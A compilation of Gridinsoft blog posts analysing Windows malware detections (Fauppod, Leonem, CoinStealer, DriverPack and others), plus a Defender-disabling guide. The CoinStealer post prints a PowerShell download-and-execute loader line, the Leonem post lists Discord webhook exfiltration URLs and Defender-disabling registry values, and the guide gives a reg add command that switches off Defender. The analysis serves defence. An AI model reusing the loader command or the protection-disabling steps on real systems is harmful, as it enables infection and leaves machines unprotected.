Trojan:Win32/Fauppod!ml Overview

Trojan:Win32/Fauppod!ml is a generic detection name that Microsoft Defender assigns to malware detected by its AI detection system. Typically, this detection points at the activity of an infostealer that primarily targets banking data. The “ml” in the detection name exactly indicates the use of a machine learning system, rather than traditional signature-based detection methods. Usually, over time, as more information about its behavior is analyzed, this detection gets a more specific detection name.

As mentioned at the beginning, the main goal of Fauppod is to steal the credentials of online accounts. One thing it goes for in particular is login credentials for online banking accounts.

Main spreading ways of this malware are malicious email attachments (attached Word or Excel files) in emails, or via sketchy game mods or other files from sketchy sources. Despite targeting specifically banking information, it is not picky about its victims, stealing info from all categories of users.

Fauppod Analysis

Let’s take a closer look at the technical part of how Fauppod!ml behaves on the system. The first thing the malware does after launching is to check if it is the only copy of malware running on the device. It achieves this by creating and accessing mutexes:

\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex.
\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex.

Since our example is a DLL file, it needs a legitimate Rundll32.exe process to run. The malware copies the legitimate Rundll32.exe file to the temporary folder C:\Users\User\AppData\Local\Temp\rundll32.exe and utilizing process hijacking techniques.

Next, the malware checks the UAC status and the presence of anti-malware on the system. It checks these registry keys to disable system defenses and ensure persistence:

HKEY_LOCAL_MACHINE\SOFTWARE
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Security
HKEY_CURRENT_USER\Software\Microsoft/Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft/Windows\CurrentVersion\Uninstall

Fauppod Execution

The malware executes shell commands that allow it to perform its main function:

C:\Users\User\AppData\Local\Temp\rundll32.exe rpl909.zip.dll
“C:\Windows\System32\rundll32.exe” C:\Users\A4148~1.MON\AppData\Local\Temp\b81d42902b581dd9fea37c4b6a8ff180.19772.dll,DllMain

After that, the malware deploys payloads and injects itself into legitimate processes, allowing it to function without raising suspicions from security software. It also manipulates processes such as wmiadap.exe, svchost.exe and cmd.exe, which are legitimate processes. The malware executes the following processes:

wmiadap.exe /F /T /R
%windir%\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
%windir%\system32\wbem\wmiprvse.exe.
%windir%\System32\svchost.exe -k WerSvcGroup
13f43b565119f43f7155f96cafa8b05d.exe
C:Windows/System32 loaddll32.exe loaddll32.exe “C:\Users\user\Desktop\init.dll”.
C:Windows / Windows / SysWOW64 / cmd.exe cmd.exe /C rundll32.exe “C:\Users / User / Desktop /init.dll”,#1.
C:Windows/sysWOW64/rundll32.exe rundll32.exe “C:\Users/User/Desktop/init.dll”,#1.
C:\Windows/SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_Clockcould@8.
C:\Windows/SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\init.dll,_DllRegisterServer@0
C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\User\Desktop\init.dll,_Representfinish@4.

So, we can conclude that the malware is also abusing the svchost.exe process in WerSvcGroup, which is related to the Windows Error Reporting Service. This is a common practice of malware that uses this process to mask its actions by injecting code into system services. The 13f43b565119f43f7155f96cafa8b05d.exe executable also appears to be part of the payload.

Fauppod Connections

The malware uses both standard addresses and ports as well as non-standard ones. Among the standard ones:

GET watson.microsoft.comhttp://watson.microsoft.com/StageOne/rundll32_exe/6_1_7600_16385/4a5bc637/StackHash_1abe/0_0_0_0/00000000/c0000005/fd8b3a80.htm?LCID=1040&OS=6.1.7601.2.00010100.1.0.48.17514&SM=LENOVO&SPN=64755N2&BV=7UET92WW%20(3.22%20)&MID=F2EC8DC6-EB4A-4B44-95EF-9B81DC7C287B

Using standard ports that belong to Microsoft allows you to hide your actions. On the other hand, using suspicious addresses and non-standard ports indicates communication with the C2 server. In our case, these addresses are:

97.107.127.161:443
45.33.94.33:5037
159.89.91.92:5037
158.69.118.130:1443

Some of the IP addresses in the list (and quite a few others that I’ve excluded for the sake of readability) correspond to compromised websites. This is a oftenly used tactic: attackers use a hacked website as an intermediary command server, while the request looks legitimate for anyone who tries to find the traces.

Is Trojan:Win32/Fauppod!ml False Detection?

As I have mentioned several times already, Trojan:Win32/Fauppod!ml is a heuristic detection based on machine learning. This means it can sometimes result in false positives. That is, Heuristic methods analyze file patterns, behaviors, and structural elements rather than relying on pre-defined signatures. As a result, legitimate software with uncommon characteristics or behaviors may be flagged as suspicious. In such cases, after some time, the anti-malware software stops flagging the file as a threat.

How to Remove Trojan Fauppod?

If you encounter Trojan:Win32/Fauppod!ml and are unsure whether it’s a false detection or a real threat, an effective solution is to use a third-party anti-malware solution. GridinSoft Anti-Malware would be a great option that can both confirm the threat and disprove it. Use the instructions below to scan your device for threats.

The post Trojan:Win32/Fauppod!ml appeared first on Gridinsoft Blog.

Trojan:Win32/Leonem Overview

Trojan:Win32/Leonem is the detection name used by Microsoft Defender to identify spyware. It’s a classic example of this malware type, which aims at stealing sensitive information from a victim’s system. In addition to its main function, it can also operate as a malware dropper, i.e. deliver other malware. In terms of its core functionality, Leonem can carry out activities like keylogging and collecting sensitive data (logins, browser passwords, browser history, cookies, cache, etc.). It also seeks other stored login credentials, stored in the compromised system, including those in email clients.

As for the payload, Leonem Trojan is capable of downloading additional malicious components. Most often, it deploys ransomware and backdoors, though its capabilities are not limited to these threats. This malware typically spreads through malicious attachments in phishing emails or bundled add-ons with legitimate software from untrustworthy sources. Once launched on the system, Trojan:Win32/Leonem attempts to disable security software and modify system settings to ensure persistence by running each time the operating system boots.

Technical Analysis

Let’s now take a deeper analysis of the threat on an infected system. Since it is a classic information stealer, it has a rather predictable behavior pattern. The malware’s initial actions focus on detecting sandbox environments, debuggers, or virtual machines. To do this, Leonem leverages the following legitimate processes:

%windir%\System32\svchost.exe -k WerSvcGroup
wmiadap.exe /F /T /R
%windir%\system32\wbem\wmiprvse.exe
"%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Leonem retrieves BIOS information using WMI queries, specifically targeting Win32_Bios and Win32_NetworkAdapter. Additionally, it exploits the aspnet_compiler.exe process and queries hardware properties via WMI. Among other things, it inspects specific registry values and files, including:

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\Levels
C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config

In addition to detecting the virtual environment, the malware generates a system fingerprint to uniquely identify the infected system.

Next, the malware assesses the presence and status of installed anti-malware solutions. If Microsoft Defender is enabled on the system, the malware attempts to turn it off. This also allows the malware to establish persistence within the system. For all this, Leonem abuses the following legitimate processes and checks the following key values and system locations:

C:\Windows\system32\services.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\SecurityHealthService.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\DisableAntiVirus
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\MpEngine_DisableScriptScanning

Data Collection

After all the checks, Trojan:Win32/Leonem initiates its primary operation: data collection. It gathers passwords and session tokens from browsers, email clients, and other applications that keep auth details locally. In addition, the malware creates a DirectInput object, enabling it to function as a keylogger, i.e. capture all text from the keyboard. It specifically targets the following file path:

Leonem collects data both in plain text and in the form of a hash.

Data Exfiltration

At the final stage of the attack, Trojan:Win32/Leonem sends the gathered data to its command server. The reviewed sample uses Discord webhook for this purpose. Beforehand, the malware sets up TCP connections on ports 443 and 80. This confirms that it attempts to communicate with remote servers to transmit information or receive commands. Below are some of the requests sent to the said webhooks.

POST https://discord.com:443/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 200
POST https://discord.com/api/webhooks/1202330946817237022/1d5Ynow6yHbMqcRfr75qQjJVcSQnFlKpV4g5H2hHiKoRW33XeyZHnl-7hxdTf95oiy9f 404

The 200 status at the end means that the request was successfully completed, and the 404 on the other hand indicates an error. This likely indicates that the webhook has either been deleted or changed. In addition, the malware utilizes the ip-api.com service to retrieve details about the hosting environment where it is executed. In this way, it tries to determine whether it is running on the server used for hosting or on a regular computer.

How To Remove Trojan:Win32/Leonem?

As we can see, Trojan:Win32/Leonem is a rather serious threat that deactivates Microsoft Defender whenever possible. Therefore, to effectively remove this Trojan, it’s recommended to use a reliable third-party anti-malware solution like GridinSoft Anti-Malware. To eliminate Trojan:Win32/Leonem from your system, follow these steps:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Leonem appeared first on Gridinsoft Blog.

PUA:Win32/GameHack Overview

PUA:Win32/GameHack is a generic Microsoft Defender detection for potentially unwanted programs (PUAs) associated with cheats or game hacking tools. While these programs are not always truly malicious, they can pose security risks or violate the terms of service of legitimate software. Also, the use of such software can lead to game or system instability, as not all of such programs are tested well enough. However, the main danger is that these programs can spread other malware or serve as a vector for its distribution.

The main reason for this is that using these tools requires disabling the system’s security software. This gives the green light to any threats that are contained in the GameHack. The file may contain encrypted or compressed data, which allows you to evade detection or conceal its true functionality. Some versions modify or create registry keys, which may as well serve as a cover for malicious activities.

Technical Analysis

Let’s examine how PUA:Win32/GameHack behaves on the target system. For the test sample, I have chosen Solara.dir, a cheat for one popular cubic game. When the executable file is launched, the system process rundll32.exe is accessed by several instances of the cheat.

"C:\Windows\system32\rundll32.exe"
"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\Solara/Microsoft.Web.WebView2.Core.dll",#1
"C:\Windows\system32\rundll32.exe" "C:\Users\\AppData\Local\Temp\Solara/Microsoft.Web.WebView2.WinForms.dll",#1

The first thing the app does is check the system for a virtual environment or sandbox. It checks some values in the system, including:

\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Main Functionality

Next, the chosen cheat performs its primary function. It uses an archiver to unpack the files of a cheat:

"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Desktop\Solara.Dir.zip"
C:\Windows\SysWOW64\7za.exe "C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\t1244hhg.u4j" "C:\Users\user\Desktop\Solara.Dir.zip"

Most files are unpacked into a temporary directory, into a randomly named folder. The latter is a rather concerning behavior: programs rarely use such strange names:

C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara
C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara\Microsoft.Web.WebView2.Core.dll
C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara\Monaco\combined.html
C:\Users\user\AppData\Local\Temp\t1244hhg.u4j\Solara\Monaco\fileaccess

Further, the GameHack program then executes scripts using the Command Prompt. It primarily targets the files that it has just dropped, but the functionality of such requests closely resembles what dropper malware can do.

"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && C:\Windows\system32\wscript.exe ^"C:\Users\\AppData\Local\Temp\Solara/Monaco/fileaccess/index.js^"
"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && C:\Windows\system32\wscript.exe ^"C:\Users\\AppData\Local\Temp\Solara/Monaco/fileaccess/node_modules/accepts/index.js^"
"C:\Windows\system32\cmd.exe" /c "cd ^"C:\Users\\AppData\Local\Temp^" && C:\Windows\system32\wscript.exe ^"C:\Users\\AppData\Local\Temp\Solara/Monaco/fileaccess/node_modules/array-flatten/array-flatten.js^"

These manipulations with Command Prompt are accompanied by the calls to several other elements. Once again, I cannot see a sign of malicious activity in this case, but it is as edgy as it can get.

C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

After these commands, the cheat can inject its code into the game process, adding features that give the player an unfair advantage. These features might include the ability to fly, unlock all inventory, or other advantages that give the player an unfair edge over others. Once again, I’d emphasize that such actions go against the rules of the vast majority of games.

Is PUA:Win32/GameHack False Positive?

Sometimes GameHack can be a false positive detection. In most cases, this is because of how anti-cheat solutions operate. Anti-cheat systems often work at the low-level of the system, injecting their code into the game process, checking the integrity of files, and analyzing network traffic. In other words, anti-cheat systems can use similar methods as cheats, which can trigger anti-malware detections.

False positive detections typically disappear quickly, unlike real hacks, as the developers promptly contact anti-malware vendors to resolve these issues. In addition, they can inform users about it on official platforms and advise them to add the game folder to the exceptions, which can be a practical solution.

How To Remove PUA:Win32/GameHack?

If you encounter a GameHack detection and suspect it’s not a false positive, here’s what you can do. You can use GridinSoft Anti-Malware to help you get rid of this and other threats, just follow the instructions below:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post What is PUA:Win32/GameHack? appeared first on Gridinsoft Blog.

Trojan:PowerShell/CoinStealer.RP!MTB Virus Detection Overview

Trojan:PowerShell/CoinStealer.RP!MTB detection name corresponds to an infostealer malware that targets crypto wallets among other things. The malware family it belongs to may be different, as the main reason why it is detected – targeting crypto wallets credentials – is now a widespread feature of infostealers. Also, the detection name points clearly at this virus running commands in the PowerShell environment. This, in fact, complicates the analysis: the detection of Microsoft Defender points at a genuine PowerShell instance.

One less obvious thing about CoinStealer.RP!MTB is the fact of it being a detection of a heuristic system. That is actually the reason why it has no identification of a malware family in the detection name. With this detection, Microsoft Defender effectively says “I have noticed fishy activity that targets at stealing login data to crypto wallets”. At the same time, it is hardly a false positive: while heuristics can show a false detection, there are no cases of CoinStealer being incorrect.

Dangers of this malware, aside from the said crypto wallet losses, is losing access to your online accounts. At its core, the CoinStealer virus is an infostealer, thence it can target social media accounts and accounts of desktop apps. Several samples that I’ve been analyzing were stealing Discord and Steam session tokens.

Spreading Ways

PowerShell script is a rather common form for malicious programs, though it requires some specific spreading approaches. In particular, “useful scripts for Windows speed-up” or similar stuff that you may find online is what can carry this virus. And there’s more – frauds constantly seek for new ways to make the user execute the malware on their own.

For instance, they may use landing pages that appear after the redirect from another website, asking to download and run the script “to prove that you’re not a robot”. In some cases, there was an entire malicious script posted as a text, with the demand to copy it and paste into the PowerShell. Obviously, this won’t end up with anything but malware injection. And this is what fits the Trojan:PowerShell/CoinStealer.RP!MTB ideally.

Technical Analysis

Now, let’s have a deeper look into how the malicious script functions. In fact, the PowerShell part is mostly about downloading the actual malware. PS scripts, although being abused by malware quite often, are not fit for accessing folders or extracting data. Still, it is enough to download the virus and configure the networking so the malware will have no problems with C2 communications. It also provides the malicious program with all the necessary privileges and anti-detection protection, so it runs unbothered.

One particular malware sample that uses PowerShell scripts for loading is Lumma Stealer. The script that eventually creates the Trojan:PowerShell/CoinStealer.RP!MTB detection runs a rather simple operation. It connects to a remote server, downloads the file, and runs it from that exact location.

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://20.99.186.246:223/1.exe', 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe');Start-Process 'C:\\Users\\%username%\\AppData\\Local\\erk3nfaib.exe'

Malware Execution

As I’ve opted for Lumma as the most prominent “user” of the injection through PowerShell, I will further analyze it to show what it can do in the infected system. Following the execution, it loads the DLLs by abusing svchost.exe – a legitimate Windows process. Malware simply commands it to execute the library it needs:

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe -k DcomLaunch -p

This is what gives malware not only the full set of libraries to run with but also the much-needed persistence. At this point, part of the CoinStealer virus files are running with system-level privileges, so antivirus programs will likely treat it as a safe process. Further, it switches to the main course of the attack – collecting user data.

Data Collection

Despite the fact that I’ve chosen a specific malware family to show off the capabilities of the malware that the Trojan:PowerShell/CoinStealer.RP!MTB can deliver, the same list applies to pretty much any infostealer that can appear under this circumstance. It goes through the folders of web browsers, collecting login credentials.

%localappdata%\\Google\\Chrome\\User Data
%localappdata%\\Chromium\\User Data
%localappdata%\\Microsoft\\Edge\\User Data
%localappdata%\\Kometa\\User Data
%localappdata%\\Opera Software\\Opera Stable
%localappdata%\\Opera Software\\Opera GX Stable

Data collection from the browser is followed by the much expected collection of crypto wallets data. It seeks for the keywords in file and folder names (like “bitcoin” or “coinbase”) to locate the needed directory. Then, it goes for the Important Files/Profile and dumps all the data from these folders. This further allows cybercriminals to drain all the contents of these wallets.

Exfiltration & C2 Communications

The malware rarely employs unusual tactics when it comes to communications with the command server. It carries a pack of C2 addresses embedded into its own code, and goes through this list trying to find an active one.

https://barebrilliancedkoso.shop/api
https://liabiliytshareodlkv.shop/api
https://notoriousdcellkw.shop/api

After establishing the connection, CoinStealer.RP!MTB sends the entire pack of data to the command server. Depending on the malware sample, it may be a plain text file, or an archive with extracted credentials sorted by the source and type. But almost always it uses encrypted connection, which prevents almost any attempts of packet analysis.

How to Remove Trojan:PowerShell/CoinStealer.RP!MTB?

To get rid of the CoinStealer.RP!MTB, I recommend using GridinSoft Anti-Malware. Removing both malicious script and the actual malware manually is not a trivial task, as they may hide pretty deep in the system. Also, as it usually happens to modern malware, it creates several copies of itself in the disk, making the manual removal even more complicated. GridinSoft Anti-Malware will do all this for you in just a few clicks.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:PowerShell/CoinStealer.RP!MTB appeared first on Gridinsoft Blog.

PUABundler:Win32/DriverPack Overview

PUABundler:Win32/DriverPack is a detection from Microsoft Defender, associated with the eponymous DriverPack Solution program. Initially, it was a program developed by a Russian author for automatic driver installation on Windows XP. However, since Windows began carrying all the necessary drivers in the installation, driver updaters have become useless. Moreover, the fact that a program operates with drivers creates significant security threats and thus should undergo diligent checks.

And that is where DriverPack shows its dark nature. Over time, it started installing additional software during its own installation – so-called software bundling. Today, DriverPack is synonymous with a bunch of unwanted and sometimes malicious software that can easily brick a freshly installed Windows. This is evidenced by many users on the Internet who have decided to take the easy way out and use DriverPack to install drivers. After using this program, at best, users get a bunch of garbage in the system. At worst, certain devices or system components may malfunction or fail.

Why is PUABundler:Win32/DriverPack Dangerous?

To understand why using DriverPack is dangerous, it’s important to understand its operation. The first version of DriverPack was a standalone installer that installed drivers on devices that don’t have ones. But these days, this program tries to update existing drivers on the system – an edgy approach, if you ask me. The problem is that the program sources newer drivers from questionable places. This may result in aforementioned failures across the system, but, what is worse – it is a direct malware risk.

Another issue is the unwanted software bundled with PUABundler:Win32/DriverPack. Regardless of the user choice, DriverPack installs its services, injects advertisements all across the system, and modifies browser homepages in all browsers. For the latter, instead of the standard search and homepage, DriverPack sets Internet-start.net (see the scan report) as the default homepage and search engine. Although the official website claims to cooperate with antivirus vendors, users tend to see a different picture.

User Experience

I decided to simulate a clean OS setup and driver installation using DriverPack (sample analysis report) in fully automatic mode. This allowed me to get a complete opinion on what PUABundler DriverPack is. There are several red flags that appear even before the installation, but more are to come.

The first warning sign is the claim about false positives from certain antiviruses on the main page. Although this may be the case, false positives are normally a temporare occasion. You should not expect a legit program being detected as unwanted or malicious on a continuous basis, otherwise it is not an occasional situation and a real detection. And the claim on the website suggests that the latter is true. During the launch and operation of the installer itself, Microsoft Defender really flagged PUA presence in the system.

And, sure enough, the described changes to the web browser popped up. PUABundler:Win32/DriverPack modified the homepage and the default search engine. The latter, in turn, shows questionable search results, which is a rather straightforward phishing risk: by manipulating the results, fraudsters behind the search engine can push malicious results to the top. The unwanted program does all this to generate revenue through ads and user redirects, not for the convenience of users. And these ads are the reason why some of the DriverPack samples are tagged as adware.

Technical Analysis

Let’s now examine the technical aspects of this unwanted software. I analyzed a copy downloaded from the official website. Notably, it has 53 out of 75 detections on VirusTotal, and the reason is obvious. During installation, PUABundler:Win32/DriverPack leverages the Mshta.exe process, typically used to execute HTML applications. It then loads an executable from AppData\Local\Temp into a temporary folder and executes the following command:

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\\AppData\Local\Temp\wgulwvl5\wgulwvl5.cmdline"
"C:\Windows\SysWOW64\mshta.exe" "C:\Program Files (x86)\DriverPack\run.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} --sfx "software.exe"

During installation, DriverPack checks the system’s software and hardware components by going through certain registry keys. This is a standard procedure for such programs, designed to locate drivers, so it is barely a bad sign. And even if we suppose a malicious intent, the worst thing this data may be used for is to distinguish this system from the others.

HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

Suspicious network activity

First thing DriverPack modifies during execution is firewall settings – mostly to let its own executable files communicate with the remote servers. Still, the fact that the developer does not specify the source of the drivers, it is not a great thing to have such an all-encompassing access.

"C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall delete rule name="DriverPack aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\\AppData\Roaming\DRPSu\temp\run_command_26701.txt""
netsh advfirewall firewall delete rule name="DriverPack aria2c.exe"
rundll32 kernel32,Sleep
"C:\Windows\System32\cmd.exe" /c "netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Program Files (x86)\DriverPack\tools\aria2c.exe" || echo Done & call echo Done %^errorLevel% > "C:\Users\\AppData\Roaming\DRPSu\temp\run_command_45238.txt""
netsh advfirewall firewall add rule name="DriverPack aria2c.exe" dir=in action=allow program="C:\Program Files (x86)\DriverPack\tools\aria2c.exe"

Payload

PUABundler:Win32/DriverPack utilizes the aria2c.exe utility to download several strangely-named files. This is rather concerning, as such a filename leaves no clue on what is the purpose of it and what are the possible effects.

"C:\Windows\SysWOW64\mshta.exe" "C:\Program Files (x86)\DriverPack\run.hta" --sfx "c99687e9829de410b66ad7006b0604c3fddb4582050ce205c1d00ff9f309e6b8.exe"
C:\Program Files (x86)\DriverPack\run.hta --sfx "c99687e9829de410b66ad7006b0604c3fddb4582050ce205c1d00ff9f309e6b8.exe"
C:\Program Files (x86)\DriverPack\start.bat "c99687e9829de410b66ad7006b0604c3fddb4582050ce205c1d00ff9f309e6b8.exe"

This represents just a fraction of what DriverPack downloads. During installation, it downloads the bundled applications – several browsers, a strange copy of Avast antivirus, and the “widgets” for the DriverPack itself. As there is no way to disable the installation of these bundled apps, this is just another concerning element of that program.

C:\Program Files (x86)\DriverPack\Tools\driverpack-wget.exe
C:\Program Files (x86)\DriverPack\programs\AvastAntivirusA.exe
C:\Program Files (x86)\DriverPack\programs\downloader_elements.exe
C:\Program Files (x86)\DriverPack\programs\downloader_browser.exe
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverPack\DriverPack.lnk

During execution, the shell displays a “virtual assistant” that occasionally speaks to the user. Nothing really malicious here, but it may be spooky to someone who did not expect a program installer to have sound effects. And overall, there are more than enough problems for the DriverPack to be considered a dangerous thing.

How To Remove DriverPack?

Manual removal of PUABundler:Win32/DriverPack is not really an option, so I recommend an automated removal with GridinSoft Anti-Malware. Follow the guide below to get your system cleaned of DriverPack PUA and all other malicious elements that may be present.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post PUABundler:Win32/DriverPack appeared first on Gridinsoft Blog.

How to Disable Microsoft Defender in Windows 10/Windows 11

There are two ways to disable Microsoft Defender: one is temporary, and the other is permanent. We’ll skip the temporary method since you’re probably here for the latter. Since the Microsoft Defender versions in Windows 10 and 11 are almost identical, this guide is applicable to both. A crucial note – these actions are only possible if you’re using an administrator account.

One more warning: I don’t recommend disabling Microsoft Defender, as this will leave your system unprotected and could have negative consequences. If you have reliable anti-malware software, like GridinSoft Anti-Malware, already running in the system, then it is fine. Otherwise, you expose your system to a significant malware risk.

Let’s begin. The first thing you need to do is disable Tamper Protection – a self-protection feature of Defender that prevents it from being disabled or tampered with externally. To do this, open Windows Security, click on Virus & Threat Protection → Manage settings.

Scroll down to Tamper Protection and turn it off. This will allow you to proceed with the next steps.

Next, open the Group Policy Editor. To do this, press the “Win + R” keys on your keyboard, and in the Run dialog that appears, type or paste “gpedit.msc” and press Enter.

In the window that opens, navigate to the following path:

Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

Find the file named “Turn Off Microsoft Defender Antivirus,” double-click it, select “Enabled,” and then click Apply and OK to apply the changes.

Disabling Microsoft Defender with Regedit

For some users, such as those with the Windows 11 Home edition, the previously mentioned method won’t work because these versions don’t have access to the Group Policy Editor. In this case, you can use the Registry Editor. To do this, press the “Win + R” keys again and type “regedit”.

In the Registry Editor window, navigate to the following path:

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender

In this folder, right-click on an empty space, create a new DWORD (32-bit) value, and name it “DisableAntiSpyware”.

Double-click on it to open it, set the Value data to “1”, and make sure the Base is set to “Hexadecimal”. Then click “OK.” Restart your PC to apply the changes, and this should disable Microsoft Defender.

Disabling Microsoft Defender with Command Prompt

If you encounter any difficulties with the last method, you can also disable it using the Command Prompt. To do this, open the Start menu or search bar and begin typing “cmd”. When the Command Prompt appears, click “Run as Administrator.”

Copy the command below, paste it into the Command Prompt window, and press “Enter,” as shown in the screenshot below:

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

That command essentially performs the actions from the previous method. After doing that change, reboot the computer for them to take effect.

Should You Disable Defender?

As I mentioned earlier, I don’t recommend disabling Microsoft Defender without a serious reason. The Windows system requires security solutions, and Microsoft addressed this by adding a built-in solution that meets the needs of most home users. This solution has undergone significant evolution and now offers a sufficient level of protection, including features like Zero Trust, sandboxing, and quite high effectiveness.

However, despite all the advantages, there’s another side to the story. All these features consume a significant amount of resources. While this may go unnoticed on modern, powerful machines, users with less powerful devices might experience some difficulties when using the system. This is particularly true for machines that use an HDD instead of an SSD. During background scanning, Microsoft Defender can noticeably strain the hard drive.

In any case, if you plan to disable Microsoft Defender completely, I don’t recommend leaving your system unprotected. Furthermore, I would suggest considering alternative solutions, such as GridinSoft Anti-Malware. It offers advanced functionality, including key components like proactive protection and an Internet Security module.

The post How to Disable Windows Defender? Windows 10 & 11 Guide appeared first on Gridinsoft Blog.

Trojan:Win32/Qhosts Overview

Trojan:Win32/Qhosts is a Microsoft Defender detection for dropper malware or remote-access trojans. Such malware is made to provide access to an infected system and deliver a payload. It is known for modifying the HOSTS system file, which is used to map hostnames to IP addresses. By doing so, it can provide itself with stable connectivity to the command server. In some cases, it does this to prevent the user from accessing antivirus vendors’ websites and getting security updates from Microsoft.

This malware is typically spread through dodgy software, like unauthorized activation tools, keygens and the like. Depending on the version, Trojan:Win32/Qhosts may block access to various services and sites, including those of Adobe and Microsoft. This partly explains its actions concerning the HOSTS file but does not account for its remote access capabilities. Sometimes, it also prevents antivirus software from accessing the Internet. This happens particularly often to software of renowned security vendors, whose server addresses are well-known.

Technical Analysis

Let’s get into the behavior analysis of Trojan:Win32/Qhosts using a specific instance as an example. In this case, it is a Windows activator, which has both its declared functionality and hidden malicious features. We’ll start with its launch, which is initiated by the user. Since this is an activator, it implies that the anti-malware software on the system must be disabled for its use. Despite this, the program performs standard checks for the presence of sandboxing/debugging or anti-malware software. It checks the following registry values:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_LOCAL_MACHINE\System\Setup
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\
